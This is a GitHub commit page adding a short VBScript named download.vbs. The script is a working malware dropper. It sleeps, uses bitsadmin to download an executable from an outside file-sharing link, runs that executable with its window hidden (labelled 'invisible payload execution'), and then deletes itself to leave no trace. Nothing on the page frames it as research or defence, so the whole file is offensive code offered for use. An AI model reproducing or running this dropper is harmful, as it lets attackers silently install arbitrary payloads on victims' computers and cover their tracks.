Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
waived authored Sep 16, 2024
0 parents commit 411e75e
Showing 1 changed file with 14 additions and 0 deletions.
14 changes: 14 additions & 0 deletions download.vbs
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
' optional delay
WScript.Sleep(30000)

' download payload via bitsadmin command
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "cmd.exe /C bitsadmin.exe /transfer MyJob ""https://oshi.at/xJnS"" ""%CD%\file.exe"" ", 0 , True

' invisible payload execution
CreateObject("WScript.Shell").Run "file.exe", 0, True

' self destruct vbscript
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
objFSO.DeleteFile WScript.ScriptFullName
WScript.Quit

0 comments on commit 411e75e

Please sign in to comment.